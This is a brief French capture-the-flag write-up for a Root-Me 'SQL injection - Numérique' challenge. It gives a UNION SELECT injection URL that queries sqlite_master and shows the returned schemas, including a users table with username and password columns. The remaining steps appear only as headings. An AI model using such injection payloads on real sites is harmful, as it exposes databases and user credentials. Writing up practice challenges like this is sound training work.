Aller au contenu

SQL injection Numérique

Samuel MANECHEZ 21/10/2021 SQL injection - Numérique Lien du CFT

1. Trouver le point d'injection

Après divers tentatives j'ai finis par tenté des injection SQL dans l'url comme ceci :

http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=1 Union Select 1,2,sql FROM sqlite_master;

2. Identifier le type de base de données

Cette commande renvoie la structure des tables :

News
2

CREATE TABLE news(id INTEGER, title TEXT, description TEXT)

2

CREATE TABLE users(username TEXT, password TEXT, Year INTEGER)

Système de news

La mise en place du système de news est désormais effective

3. Déterminer le nombre de colonnes de la requête de l'application

4. Si nécessaire déterminer les types des colonnes

5. Exploiter la faille en fonction de l'objectif de l'attaque